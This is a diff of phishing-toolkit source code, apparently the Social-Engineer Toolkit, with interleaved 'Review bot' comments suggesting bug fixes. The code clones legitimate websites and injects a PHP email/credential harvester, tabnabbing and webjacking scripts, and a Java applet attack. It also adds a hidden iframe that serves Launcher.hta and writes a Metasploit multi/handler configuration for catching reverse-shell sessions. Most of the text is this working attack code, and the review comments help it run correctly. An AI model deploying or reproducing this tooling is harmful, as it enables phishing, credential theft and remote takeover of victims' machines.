"<body>", """<body><?php $file = '%s'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (harvester_file)) "<body>", """<body><?php $file = '%s'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (harvester_file))
filewrite = open(setdir + "/web_clone/index.2", "w") filewrite = open(userconfigpath + "web_clone/index.2", "w")
filewrite.write(data) filewrite.write(data)
filewrite.close() filewrite.close()
os.remove(setdir + "/web_clone/index.html") os.remove(userconfigpath + "web_clone/index.html")
shutil.copyfile(setdir + "/web_clone/index.2", shutil.copyfile(userconfigpath + "web_clone/index.2",
setdir + "/web_clone/index.html") userconfigpath + "web_clone/index.html")
# copy the entire web_clone directory. # copy the entire web_clone directory.
# Without this only index.php|html are copied even though the user # Without this only index.php|html are copied even though the user
# may have chosen to import the entire directory in the set module. # may have chosen to import the entire directory in the set module.
copyfolder(setdir + "/web_clone", apache_dir) copyfolder(userconfigpath + "web_clone", apache_dir)
if os.path.isfile("%s/index.html" % (apache_dir)): if os.path.isfile("%s/index.html" % (apache_dir)):
os.remove("%s/index.html" % (apache_dir)) os.remove("%s/index.html" % (apache_dir))
if track_email == False: if track_email == False:
shutil.copyfile(setdir + "/web_clone/index.html", shutil.copyfile(userconfigpath + "web_clone/index.html",
"%s/index.html" % (apache_dir)) "%s/index.html" % (apache_dir))
if track_email == True: if track_email == True:
shutil.copyfile(setdir + "/web_clone/index.html", shutil.copyfile(userconfigpath + "web_clone/index.html",
"%s/index.php" % (apache_dir)) "%s/index.php" % (apache_dir))
print_status( print_status(
"NOTE: The URL to click on is index.php NOT index.html with track emails.") "NOTE: The URL to click on is index.php NOT index.html with track emails.")
@ -615,7 +615,7 @@ if webattack_email == True:
module_reload(src.phishing.smtp.client.smtp_web) module_reload(src.phishing.smtp.client.smtp_web)
# see if we're tabnabbing or multiattack # see if we're tabnabbing or multiattack
fileopen = open(setdir + "/attack_vector", "r") fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
if line == 'tabnabbing': if line == 'tabnabbing':
@ -628,12 +628,12 @@ for line in fileopen:
if ssl_flag == 'true': if ssl_flag == 'true':
web_port = "443" web_port = "443"
# check for PEM files here # check for PEM files here
if not os.path.isfile(setdir + "/newreq.pem"): if not os.path.isfile(userconfigpath + "newreq.pem"):
print("PEM files not detected. SSL will not work properly.") print("PEM files not detected. SSL will not work properly.")
if not os.path.isfile(setdir + "/newcert.pem"): if not os.path.isfile(userconfigpath + "newcert.pem"):
print("PEM files not detected. SSL will not work properly.") print("PEM files not detected. SSL will not work properly.")
# copy over our PEM files # copy over our PEM files
subprocess.Popen("cp %s/*.pem %s/web_clone/" % (setdir, setdir), subprocess.Popen("cp %s/*.pem %s/web_clone/" % (userconfigpath, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# copy patched socket over to web clone # copy patched socket over to web clone
definepath = os.getcwd() definepath = os.getcwd()
@ -643,7 +643,7 @@ if ssl_flag == 'true':
# head over to cloned dir # head over to cloned dir
if apache_check == False: if apache_check == False:
os.chdir(setdir + "/web_clone/") os.chdir(userconfigpath + "web_clone/")
if attack_vector != "multiattack": if attack_vector != "multiattack":
if apache_check == False: if apache_check == False:
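Review bot: `userconfigpath + "cc_harvester_hit" % (userconfigpath)` raises TypeError at runtime: `%` binds tighter than `+`, and `"cc_harvester_hit" % userconfigpath` applies a string argument to a format with no conversion specifier ("not all arguments converted"), so the command-center branch can never create its marker file; the line should be `userconfigpath + "cc_harvester_hit"`, the `% (...)` being a leftover. This predates the rename, but the commit rewrote the line without fixing it. Separately, in SETHandler `os.path.join(webroot, self.path)` discards webroot whenever the request path begins with `/`, which an HTTP request path always does, so `requested_file` is not confined to web_clone; what it is used for lies outside the hunk, but if it is opened, a guard such as `if not requested_file.startswith(webroot + os.sep): self.send_error(403); return` should follow the abspath call.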


@ -7,8 +7,8 @@ import datetime
from src.core.setcore import * from src.core.setcore import *
# make sure the reports directory is created # make sure the reports directory is created
if not os.path.isdir(setdir + "/reports/"): if not os.path.isdir(userconfigpath + "reports/"):
os.makedirs(setdir + "/reports/") os.makedirs(userconfigpath + "reports/")
# #
# Quick report generation script # Quick report generation script
@ -33,20 +33,20 @@ definepath = os.getcwd()
# grab URL and report information # grab URL and report information
now = datetime.datetime.today() now = datetime.datetime.today()
fileopen = open(setdir + "/site.template", "r") fileopen = open(userconfigpath + "site.template", "r")
site_template = open(setdir + "/site.template", "r").readlines() site_template = open(userconfigpath + "site.template", "r").readlines()
fileopen1 = open("%s/src/core/reports/index.html" % (definepath), "r") fileopen1 = open("%s/src/core/reports/index.html" % (definepath), "r")
for line in fileopen: for line in fileopen:
match = re.search("URL=", line) match = re.search("URL=", line)
if match: if match:
url = line.replace("URL=http://", "") url = line.replace("URL=http://", "")
url = line.replace("URL=https://", "") url = line.replace("URL=https://", "")
filewrite2 = open(setdir + "/reports/%s.xml" % (now), "a") filewrite2 = open(userconfigpath + "reports/%s.xml" % (now), "a")
filewrite2.write(r"""<?xml version="1.0" encoding='UTF-8'?>""" + "\n") filewrite2.write(r"""<?xml version="1.0" encoding='UTF-8'?>""" + "\n")
filewrite2.write(r"<harvester>" + "\n") filewrite2.write(r"<harvester>" + "\n")
for line2 in fileopen1: for line2 in fileopen1:
counter = 0 counter = 0
filewrite = open(setdir + "/reports/%s.html" % (now), "a") filewrite = open(userconfigpath + "reports/%s.html" % (now), "a")
match1 = re.search("REPLACEHEREDUDE", line2) match1 = re.search("REPLACEHEREDUDE", line2)
if match1: if match1:
line2 = line2.replace("REPLACEHEREDUDE", url) line2 = line2.replace("REPLACEHEREDUDE", url)
@ -83,8 +83,8 @@ for line in fileopen:
# look for how many people visited the website # look for how many people visited the website
match5 = re.search("VISITORSHERE", line2) match5 = re.search("VISITORSHERE", line2)
if match5: if match5:
if os.path.isfile(setdir + "/visits.file"): if os.path.isfile(userconfigpath + "visits.file"):
fileopen3 = open(setdir + "/visits.file", "r") fileopen3 = open(userconfigpath + "visits.file", "r")
counter5 = 0 counter5 = 0
for line in fileopen3: for line in fileopen3:
if line != "": if line != "":
@ -92,7 +92,7 @@ for line in fileopen:
counter5 = counter5 + 1 counter5 = counter5 + 1
if line == "": if line == "":
counter5 = 0 counter5 = 0
if not os.path.isfile(setdir + "/visits.file"): if not os.path.isfile(userconfigpath + "visits.file"):
counter5 = 0 counter5 = 0
line2 = line2.replace("VISITORSHERE", str(counter5), 2) line2 = line2.replace("VISITORSHERE", str(counter5), 2)
@ -101,13 +101,13 @@ for line in fileopen:
match6 = re.search("BITESHERE", line2) match6 = re.search("BITESHERE", line2)
if match6: if match6:
if os.path.isfile(setdir + "/bites.file"): if os.path.isfile(userconfigpath + "bites.file"):
fileopen4 = open(setdir + "/bites.file", "r") fileopen4 = open(userconfigpath + "bites.file", "r")
counter5 = 0 counter5 = 0
for line in fileopen4: for line in fileopen4:
line = line.rstrip() line = line.rstrip()
counter5 = counter5 + 1 counter5 = counter5 + 1
if not os.path.isfile(setdir + "/bites.file"): if not os.path.isfile(userconfigpath + "bites.file"):
counter5 = 0 counter5 = 0
line2 = line2.replace("BITESHERE", str(counter5)) line2 = line2.replace("BITESHERE", str(counter5))
@ -125,6 +125,6 @@ except:
pass pass
subprocess.Popen("cp -rf %s/src/core/reports/files %s/reports/" % (definepath, subprocess.Popen("cp -rf %s/src/core/reports/files %s/reports/" % (definepath,
setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print(bcolors.BLUE + "[*] File exported to %s/reports/%s.html for your reading pleasure..." % (setdir, now) + bcolors.ENDC) print(bcolors.BLUE + "[*] File exported to %s/reports/%s.html for your reading pleasure..." % (userconfigpath, now) + bcolors.ENDC)
print(bcolors.BLUE + "[*] File in XML format exported to %s/reports/%s.xml for your reading pleasure..." % (setdir, now) + bcolors.ENDC) print(bcolors.BLUE + "[*] File in XML format exported to %s/reports/%s.xml for your reading pleasure..." % (userconfigpath, now) + bcolors.ENDC)
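Review bot: `filewrite = open(userconfigpath + "reports/%s.html" % (now), "a")` sits inside the `for line2 in fileopen1:` loop, so the HTML report is reopened in append mode once per template line and, like the other `open(...)` calls in this hunk, is never closed; open it once above the loop next to `filewrite2`, or wrap the loop in `with open(...) as filewrite:`. The `%` binds before `+` here, so the path itself is correct, but it again depends on userconfigpath ending in a separator. Also, the two `url = line.replace(...)` lines each start from `line`, so the second overwrites the first and an `http://` prefix is never stripped; the second should read `url = url.replace("URL=https://", "")`.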


@ -24,13 +24,13 @@ else:
# set the multiattack tabnabbing/webjacking flag # set the multiattack tabnabbing/webjacking flag
multi_tabnabbing = "off" multi_tabnabbing = "off"
multi_webjacking = "off" multi_webjacking = "off"
if os.path.isfile(setdir + "/multi_tabnabbing"): if os.path.isfile(userconfigpath + "multi_tabnabbing"):
multi_tabnabbing = "on" multi_tabnabbing = "on"
if os.path.isfile(setdir + "/multi_webjacking"): if os.path.isfile(userconfigpath + "multi_webjacking"):
multi_webjacking = "on" multi_webjacking = "on"
# see if we're tabnabbing # see if we're tabnabbing
fileopen = open(setdir + "/attack_vector", "r") fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
if line == 'tabnabbing' or multi_tabnabbing == "on" or line == 'webjacking' or multi_webjacking == "on": if line == 'tabnabbing' or multi_tabnabbing == "on" or line == 'webjacking' or multi_webjacking == "on":
@ -59,8 +59,8 @@ if apache_mode == "on":
apache_rewrite = "post.php" apache_rewrite = "post.php"
# start the scraping process # start the scraping process
fileopen = open(setdir + "/web_clone/%s" % (site), "r").readlines() fileopen = open(userconfigpath + "web_clone/%s" % (site), "r").readlines()
filewrite = open(setdir + "/web_clone/index.html.new", "w") filewrite = open(userconfigpath + "web_clone/index.html.new", "w")
for line in fileopen: for line in fileopen:
# specify if it found post params # specify if it found post params
@ -102,9 +102,9 @@ for line in fileopen:
# close the file # close the file
filewrite.close() filewrite.close()
# move our newly created website with our post stuff to our cloned area # move our newly created website with our post stuff to our cloned area
if os.path.isfile(setdir + "/web_clone/index.html.new"): if os.path.isfile(userconfigpath + "web_clone/index.html.new"):
shutil.copyfile(setdir + "/web_clone/index.html.new", setdir + "/" + site) shutil.copyfile(userconfigpath + "web_clone/index.html.new", userconfigpath + "" + site)
if os.path.isfile(setdir + "/web_clone/" + site): if os.path.isfile(userconfigpath + "web_clone/" + site):
os.remove(setdir + "/web_clone/" + site) os.remove(userconfigpath + "web_clone/" + site)
shutil.move(setdir + "/web_clone/index.html.new", shutil.move(userconfigpath + "web_clone/index.html.new",
setdir + "/web_clone/%s" % (site)) userconfigpath + "web_clone/%s" % (site))
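Review bot: `userconfigpath + "" + site` on the shutil.copyfile line is a mechanical leftover of stripping the leading slash; the empty literal contributes nothing and the line should read `shutil.copyfile(userconfigpath + "web_clone/index.html.new", userconfigpath + site)`. More generally, every path in this section now depends on `userconfigpath` ending in a separator, which nothing in these hunks guarantees; `os.path.join(userconfigpath, "web_clone", site)` is correct either way and matches the `os.path.join(core.userconfigpath, "dhcp.conf")` form the dhcp section at the end of this page already uses. The same concatenation pattern recurs in the hta, multiattack, tabnabbing and cloner sections below, so one helper or a consistent `os.path.join` would cover all of them. The module-level code around these hunks continues outside the view.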


@ -56,16 +56,16 @@ def gen_hta_cool_stuff():
html_code = ("""<iframe id="frame" src="Launcher.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>\n<script type="text/javascript">setTimeout(function(){window.location.href="%s";}, 15000);</script>""" % url) html_code = ("""<iframe id="frame" src="Launcher.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>\n<script type="text/javascript">setTimeout(function(){window.location.href="%s";}, 15000);</script>""" % url)
# metasploit answer file here # metasploit answer file here
filewrite = open(setdir + "/meta_config", "w") filewrite = open(userconfigpath + "meta_config", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (selection, ipaddr, port)) filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (selection, ipaddr, port))
filewrite.close() filewrite.close()
# write out main1 and main2 # write out main1 and main2
filewrite = open(setdir + "/hta_index", "w") filewrite = open(userconfigpath + "hta_index", "w")
filewrite.write(html_code) filewrite.write(html_code)
filewrite.close() filewrite.close()
# write out launcher.hta # write out launcher.hta
filewrite = open(setdir + "/Launcher.hta", "w") filewrite = open(userconfigpath + "Launcher.hta", "w")
filewrite.write(main1 + main2 + main3 + main4) filewrite.write(main1 + main2 + main3 + main4)
filewrite.close() filewrite.close()


@ -51,12 +51,12 @@ def flag_off(vector):
def write_file(filename, results): def write_file(filename, results):
filewrite = open(setdir + "/%s" % (filename), "w") filewrite = open(userconfigpath + "%s" % (filename), "w")
filewrite.write(results) filewrite.write(results)
filewrite.close() filewrite.close()
# specify attackvector # specify attackvector
filewrite = open(setdir + "/attack_vector", "w") filewrite = open(userconfigpath + "attack_vector", "w")
filewrite.write("multiattack") filewrite.write("multiattack")
filewrite.close() filewrite.close()
@ -79,14 +79,14 @@ webdav_enable = "OFF"
# see if we are running a custom cloned website # see if we are running a custom cloned website
clonedurl = 0 clonedurl = 0
fileopen = open(setdir + "/site.template", "r") fileopen = open(userconfigpath + "site.template", "r")
data = fileopen.read() data = fileopen.read()
if "TEMPLATE=SELF" in data: if "TEMPLATE=SELF" in data:
clonedurl = 1 clonedurl = 1
# clean up cloner directory # clean up cloner directory
if clonedurl == 0: if clonedurl == 0:
subprocess.Popen("rm -rf %s/web_clone;mkdir %s/web_clone/" % (setdir, setdir), subprocess.Popen("rm -rf %s/web_clone;mkdir %s/web_clone/" % (userconfigpath, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# set a quick loop to see what the user wants # set a quick loop to see what the user wants
@ -349,7 +349,7 @@ if meta_attack == "on":
# this checks to see if the MSF payload uses webdav, if so we have to # this checks to see if the MSF payload uses webdav, if so we have to
# force port 80 # force port 80
if os.path.isfile(setdir + "/webdav_enabled"): if os.path.isfile(userconfigpath + "webdav_enabled"):
webdav_enabled = "on" webdav_enabled = "on"
# set this incase msf attack, java applet, and harvester is needed # set this incase msf attack, java applet, and harvester is needed
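Review bot: The `rm -rf %s/web_clone;mkdir %s/web_clone/` command in the `clonedurl == 0` branch still runs through `shell=True` with `userconfigpath` interpolated unquoted, so a config path containing a space or shell metacharacter changes which directory is removed; if `userconfigpath` now ends in a separator, as the rest of the commit assumes, it also yields `//web_clone`, harmless on POSIX but a sign that the string is doing the path join. Replacing the Popen with `shutil.rmtree(os.path.join(userconfigpath, "web_clone"), ignore_errors=True)` followed by `os.makedirs(os.path.join(userconfigpath, "web_clone"))` avoids the shell entirely (assuming shutil is imported in this file, which the hunks do not show). The `"%s" % (filename)` in write_file is likewise a no-op wrapper around a plain string; `open(userconfigpath + filename, "w")` says the same thing. The module-level code around these hunks continues outside the view.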


@ -18,13 +18,13 @@ for line in fileopen:
webjacking_timing = line webjacking_timing = line
# grab attack_vector specification # grab attack_vector specification
fileopen = open(setdir + "/attack_vector", "r") fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen: for line in fileopen:
attack_vector = line.rstrip() attack_vector = line.rstrip()
# need to see if we created file to trigger multi attack webjacking # need to see if we created file to trigger multi attack webjacking
multi_webjacking = "off" multi_webjacking = "off"
if os.path.isfile(setdir + "/multi_webjacking"): if os.path.isfile(userconfigpath + "multi_webjacking"):
multi_webjacking = "on" multi_webjacking = "on"
@ -34,7 +34,7 @@ if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=") ipaddr = check_options("IPADDR=")
# pull URL field so we can pull favicon later on # pull URL field so we can pull favicon later on
fileopen = open(setdir + "/site.template", "r").readlines() fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen: for line in fileopen:
match = re.search("URL=", line) match = re.search("URL=", line)
if match: if match:
@ -48,12 +48,12 @@ for line in fileopen:
# move cloned site to index2.html # move cloned site to index2.html
subprocess.Popen("mv %s/web_clone/index.html %s/web_clone/index2.html" % subprocess.Popen("mv %s/web_clone/index.html %s/web_clone/index2.html" %
(setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# grab the source and write it out to the cloned directory # grab the source and write it out to the cloned directory
fileopen = open("src/webattack/tabnabbing/source.js", "r") fileopen = open("src/webattack/tabnabbing/source.js", "r")
# write it to dir # write it to dir
filewrite = open(setdir + "/web_clone/source.js", "w") filewrite = open(userconfigpath + "web_clone/source.js", "w")
# loop # loop
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
@ -66,10 +66,10 @@ filewrite.close()
if attack_vector == "tabnabbing": if attack_vector == "tabnabbing":
# grab favicon # grab favicon
favicon = urllib.urlopen("%s/favicon.ico" % (URL)) favicon = urllib.urlopen("%s/favicon.ico" % (URL))
output = open(setdir + '/web_clone/favicon.ico', 'wb') output = open(userconfigpath + '/web_clone/favicon.ico', 'wb')
output.write(favicon.read()) output.write(favicon.read())
output.close() output.close()
filewrite1 = open(setdir + "/web_clone/index.html", "w") filewrite1 = open(userconfigpath + "web_clone/index.html", "w")
filewrite1.write( filewrite1.write(
'<head><script type="text/javascript" src="source.js"></script></head>\n') '<head><script type="text/javascript" src="source.js"></script></head>\n')
filewrite1.write("<body>\n") filewrite1.write("<body>\n")
@ -79,7 +79,7 @@ if attack_vector == "tabnabbing":
# define webjacking or multi webjacking here # define webjacking or multi webjacking here
if attack_vector == "webjacking" or multi_webjacking == "on": if attack_vector == "webjacking" or multi_webjacking == "on":
filewrite1 = open(setdir + "/web_clone/index.html", "w") filewrite1 = open(userconfigpath + "web_clone/index.html", "w")
filewrite1.write("<script>\n") filewrite1.write("<script>\n")
filewrite1.write("function a(){\n") filewrite1.write("function a(){\n")
filewrite1.write( filewrite1.write(
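Review bot: The favicon line `open(userconfigpath + '/web_clone/favicon.ico', 'wb')` in the tabnabbing branch keeps the leading slash that every other path in this commit drops, so it is the one path here still built as `<userconfigpath>//web_clone/favicon.ico`; harmless on POSIX, but inconsistent with the new convention and wrong if `userconfigpath` is ever used without a trailing separator. It should read `output = open(userconfigpath + 'web_clone/favicon.ico', 'wb')`, or better `output = open(os.path.join(userconfigpath, 'web_clone', 'favicon.ico'), 'wb')`. The module-level code around these hunks continues outside the view.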


@ -46,17 +46,17 @@ site_cloned = True
meterpreter_iframe = "8080" meterpreter_iframe = "8080"
# make dir if needed # make dir if needed
if not os.path.isdir(setdir + "/web_clone/"): if not os.path.isdir(userconfigpath + "web_clone/"):
os.makedirs(setdir + "/web_clone") os.makedirs(userconfigpath + "web_clone")
# if we used a proxy configuration from the set-proxy # if we used a proxy configuration from the set-proxy
if os.path.isfile(setdir + "/proxy.confg"): if os.path.isfile(userconfigpath + "proxy.confg"):
fileopen = open(setdir + "/proxy.config", "r") fileopen = open(userconfigpath + "proxy.config", "r")
proxy_config = fileopen.read().rstrip() proxy_config = fileopen.read().rstrip()
# just do a ls # just do a ls
if not os.path.isfile(setdir + "/proxy.confg"): if not os.path.isfile(userconfigpath + "proxy.confg"):
proxy_config = "ls" proxy_config = "ls"
# if counter == 0: web_port=80 # if counter == 0: web_port=80
@ -64,7 +64,7 @@ if not os.path.isfile(setdir + "/proxy.confg"):
webdav_meta = 0 webdav_meta = 0
# see if exploit requires webdav # see if exploit requires webdav
try: try:
fileopen = open(setdir + "/meta_config", "r") fileopen = open(userconfigpath + "meta_config", "r")
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
match = re.search("set SRVPORT 80", line) match = re.search("set SRVPORT 80", line)
@ -77,7 +77,7 @@ except:
template = "" template = ""
# Grab custom or set defined # Grab custom or set defined
fileopen = open(setdir + "/site.template", "r").readlines() fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
match = re.search("TEMPLATE=", line) match = re.search("TEMPLATE=", line)
@ -87,8 +87,8 @@ for line in fileopen:
# grab attack_vector specification # grab attack_vector specification
attack_vector = "" attack_vector = ""
if os.path.isfile(setdir + "/attack_vector"): if os.path.isfile(userconfigpath + "attack_vector"):
fileopen = open(setdir + "/attack_vector", "r").readlines() fileopen = open(userconfigpath + "attack_vector", "r").readlines()
for line in fileopen: for line in fileopen:
attack_vector = line.rstrip() attack_vector = line.rstrip()
@ -108,7 +108,7 @@ update_options("APPLET_NAME=" + rand_gen_applet)
try: try:
# open our config file that was specified in SET # open our config file that was specified in SET
fileopen = open(setdir + "/site.template", "r").readlines() fileopen = open(userconfigpath + "site.template", "r").readlines()
# start loop here # start loop here
url_counter = 0 url_counter = 0
for line in fileopen: for line in fileopen:
@ -146,10 +146,10 @@ try:
if wget == 1: if wget == 1:
if check_config("WGET_DEEP").lower() == "on": if check_config("WGET_DEEP").lower() == "on":
subprocess.Popen('%s;wget -H -N -k -p -l 2 -nd -P %s/web_clone/ --no-check-certificate -U "%s" "%s";' % subprocess.Popen('%s;wget -H -N -k -p -l 2 -nd -P %s/web_clone/ --no-check-certificate -U "%s" "%s";' %
(proxy_config, setdir, user_agent, url), shell=True).wait() (proxy_config, userconfigpath, user_agent, url), shell=True).wait()
else: else:
subprocess.Popen('%s;cd %s/web_clone/;wget --no-check-certificate -O index.html -c -k -U "%s" "%s";' % subprocess.Popen('%s;cd %s/web_clone/;wget --no-check-certificate -O index.html -c -k -U "%s" "%s";' %
(proxy_config, setdir, user_agent, url), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() (proxy_config, userconfigpath, user_agent, url), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
else: else:
# if we don't have wget installed we will use python to rip, # if we don't have wget installed we will use python to rip,
@ -169,7 +169,7 @@ try:
# if the site has cloned properly # if the site has cloned properly
site_cloned = True site_cloned = True
# open file for writing # open file for writing
filewrite = open(setdir + "/web_clone/index.html", "w") filewrite = open(userconfigpath + "web_clone/index.html", "w")
# write the data back from the request # write the data back from the request
filewrite.write(html) filewrite.write(html)
# close the file # close the file
@ -181,18 +181,18 @@ try:
pass pass
# If the website did not clone properly, exit out. # If the website did not clone properly, exit out.
if not os.path.isfile(setdir + "/web_clone/index.html"): if not os.path.isfile(userconfigpath + "web_clone/index.html"):
print(( print((
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC)) bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC))
return_continue() return_continue()
site_cloned = False site_cloned = False
# add file to let set interactive shell know it was unsuccessful # add file to let set interactive shell know it was unsuccessful
filewrite = open(setdir + "/cloner.failed", "w") filewrite = open(userconfigpath + "cloner.failed", "w")
filewrite.write("failed") filewrite.write("failed")
filewrite.close() filewrite.close()
if os.path.isfile(setdir + "/web_clone/index.html"): if os.path.isfile(userconfigpath + "web_clone/index.html"):
fileopen = open(setdir + "/web_clone/index.html", "r") fileopen = open(userconfigpath + "web_clone/index.html", "r")
counter = 0 counter = 0
for line in fileopen: for line in fileopen:
counter = counter + 1 counter = counter + 1
@ -201,27 +201,27 @@ try:
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC)) bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC))
return_continue() return_continue()
site_cloned = False site_cloned = False
os.remove(setdir + "/web_clone/index.html") os.remove(userconfigpath + "web_clone/index.html")
# add file to let set interactive shell know it was # add file to let set interactive shell know it was
# unsuccessful # unsuccessful
filewrite = open(setdir + "/cloner.failed", "w") filewrite = open(userconfigpath + "cloner.failed", "w")
filewrite.write("failed") filewrite.write("failed")
filewrite.close() filewrite.close()
if site_cloned == True: if site_cloned == True:
# make a backup of the site if needed # make a backup of the site if needed
shutil.copyfile(setdir + "/web_clone/index.html", shutil.copyfile(userconfigpath + "web_clone/index.html",
setdir + "/web_clone/index.html.bak") userconfigpath + "web_clone/index.html.bak")
if site_cloned == True: if site_cloned == True:
# if we specify UNC embedding # if we specify UNC embedding
if unc_embed == True: if unc_embed == True:
fileopen = open(setdir + "/web_clone/index.html", "r") fileopen = open(userconfigpath + "web_clone/index.html", "r")
index_database = fileopen.read() index_database = fileopen.read()
filewrite = open(setdir + "/web_clone/index.html", "w") filewrite = open(userconfigpath + "web_clone/index.html", "w")
# Open the UNC EMBED # Open the UNC EMBED
fileopen4 = open("src/webattack/web_clone/unc.database", "r") fileopen4 = open("src/webattack/web_clone/unc.database", "r")
@ -243,7 +243,7 @@ try:
# check for java flag for multi attack # check for java flag for multi attack
multi_java = False multi_java = False
if os.path.isfile(setdir + "/multi_java"): if os.path.isfile(userconfigpath + "multi_java"):
multi_java = True multi_java = True
if attack_vector == "java" or multi_java: if attack_vector == "java" or multi_java:
@ -254,17 +254,17 @@ try:
bcolors.RED + "[*] Injecting Java Applet attack into the newly cloned website." + bcolors.ENDC)) bcolors.RED + "[*] Injecting Java Applet attack into the newly cloned website." + bcolors.ENDC))
# Read in newly created index.html # Read in newly created index.html
time.sleep(2) time.sleep(2)
if not os.path.isfile(setdir + "/web_clone/index.html"): if not os.path.isfile(userconfigpath + "web_clone/index.html"):
# trigger error that we were unable to grab the website :( # trigger error that we were unable to grab the website :(
print_error( print_error(
"Unable to clone the website it appears. Email us to fix.") "Unable to clone the website it appears. Email us to fix.")
sys.exit() sys.exit()
fileopen = open(setdir + "/web_clone/index.html", "r") fileopen = open(userconfigpath + "web_clone/index.html", "r")
# Read add-on for java applet # Read add-on for java applet
fileopen2 = open("src/webattack/web_clone/applet.database", "r") fileopen2 = open("src/webattack/web_clone/applet.database", "r")
# Write to new file with java applet added # Write to new file with java applet added
filewrite = open(setdir + "/web_clone/index.html.new", "w") filewrite = open(userconfigpath + "web_clone/index.html.new", "w")
fileopen3 = open("src/webattack/web_clone/repeater.database", "r") fileopen3 = open("src/webattack/web_clone/repeater.database", "r")
# this is our cloned website # this is our cloned website
@ -368,31 +368,31 @@ try:
# if we are using HTA attack # if we are using HTA attack
if check_options("ATTACK_VECTOR") == "HTA": if check_options("ATTACK_VECTOR") == "HTA":
if os.path.isfile(setdir + "/Launcher.hta"): if os.path.isfile(userconfigpath + "Launcher.hta"):
data1 = open(setdir + "/web_clone/index.html", "r").read() data1 = open(userconfigpath + "web_clone/index.html", "r").read()
data2 = open(setdir + "/hta_index", "r").read() data2 = open(userconfigpath + "hta_index", "r").read()
data3 = data1.replace("</body>", data2 + "</body>") data3 = data1.replace("</body>", data2 + "</body>")
filewrite = open(setdir + "/web_clone/index.html", "w") filewrite = open(userconfigpath + "web_clone/index.html", "w")
filewrite.write(data3) filewrite.write(data3)
filewrite.close() filewrite.close()
print_status("Copying over files to Apache server...") print_status("Copying over files to Apache server...")
apache_dir = check_config("APACHE_DIRECTORY=") apache_dir = check_config("APACHE_DIRECTORY=")
if os.path.isdir(apache_dir + "/html"): if os.path.isdir(apache_dir + "/html"):
apache_dir = apache_dir + "/html" apache_dir = apache_dir + "/html"
shutil.copyfile(setdir + "/web_clone/index.html", shutil.copyfile(userconfigpath + "web_clone/index.html",
apache_dir + "/index.html") apache_dir + "/index.html")
shutil.copyfile(setdir + "/Launcher.hta", shutil.copyfile(userconfigpath + "Launcher.hta",
apache_dir + "/Launcher.hta") apache_dir + "/Launcher.hta")
print_status("Launching Metapsloit.. Please wait one.") print_status("Launching Metapsloit.. Please wait one.")
subprocess.Popen("%smsfconsole -r %s/meta_config" % subprocess.Popen("%smsfconsole -r %s/meta_config" %
(meta_path(), setdir), shell=True).wait() (meta_path(), userconfigpath), shell=True).wait()
# selection of browser exploits # selection of browser exploits
# check to see if multiattack is in use # check to see if multiattack is in use
multi_meta = "off" multi_meta = "off"
if os.path.isfile(setdir + "/multi_meta"): if os.path.isfile(userconfigpath + "multi_meta"):
multi_meta = "on" multi_meta = "on"
if attack_vector == "browser" or multi_meta == "on": if attack_vector == "browser" or multi_meta == "on":
@ -400,19 +400,19 @@ try:
bcolors.RED + "[*] Injecting iframes into cloned website for MSF Attack...." + bcolors.ENDC)) bcolors.RED + "[*] Injecting iframes into cloned website for MSF Attack...." + bcolors.ENDC))
# Read in newly created index.html # Read in newly created index.html
if attack_vector == "multiattack": if attack_vector == "multiattack":
if os.path.isfile(setdir + "/web_clone/index.html"): if os.path.isfile(userconfigpath + "web_clone/index.html"):
os.remove(setdir + "/web_clone/index.html") os.remove(userconfigpath + "web_clone/index.html")
# check to see if the file is there first # check to see if the file is there first
if not os.path.isfile(setdir + "/web_clone/index.html.new"): if not os.path.isfile(userconfigpath + "web_clone/index.html.new"):
if os.path.isfile(setdir + "/web_clone/index.html.bak"): if os.path.isfile(userconfigpath + "web_clone/index.html.bak"):
shutil.copyfile( shutil.copyfile(
